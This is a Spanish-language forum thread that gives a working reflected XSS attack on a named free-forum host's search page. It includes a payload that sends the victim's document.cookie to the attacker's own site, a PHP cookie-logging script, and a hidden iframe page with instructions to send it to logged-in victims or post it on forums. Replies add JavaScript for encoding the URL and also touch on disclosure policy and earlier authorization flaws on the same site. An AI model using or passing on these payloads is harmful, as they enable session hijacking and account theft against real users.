[XSS] foroswebgratis

Iniciado por 6666, 28 Enero 2008, 03:52 AM

0 Miembros y 1 Visitante están viendo este tema.

6666

en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web  "home-buscador-run.php"

link:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />


y aqui la tabla para encodearla:
son los de la columna code..


http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

<?php
 $cookie 
$_GET['c'];
 
$ip getenv ('REMOTE_ADDR');
 
$date=date("m/d/Y g:i:s a");
 
$referer=getenv ('HTTP_REFERER');
 
$fl fopen('log.txt''a');
 
fwrite($fl"\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 
fclose($fl);
?>



index.htm

<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!


sirdarckcat

Para codificar puedes usar..
javascript:x=[];for each(s in "tu-pagina-web")x.push(s.charCodeAt(0));x;

Lee la politica de disclosure.. debes colocar un enlace a una web tuya donde reportes esta vulnerabilidad.

Saludos!!

berz3k

g00d, el "string line" que buscaba, me gusto hacerlo directo r0x.

thanks sirdarckgatito

-berz3k.


sirdarckcat

Ahmm no funciona en IExplorer.. porque uso algo de javascript 1.7

Esto funciona en IExplorer y Opera y Firefox:
javascript:"tu-pagina-web".replace(/./g,function(x){return x.charCodeAt(0)+","});

6666

woow! la verdad que me sirvio ese aporte.


Cicklow

www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio

6666


Achernar

Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..

1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

:huh:

2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Gracias.

Asfasfos

Citar1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

Seguramente por las comillas dobles

Citar2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Depende de si el usuario que ejecuta el XSS está logueado o no, si lo está entonces seguramente si que robes cookies válidas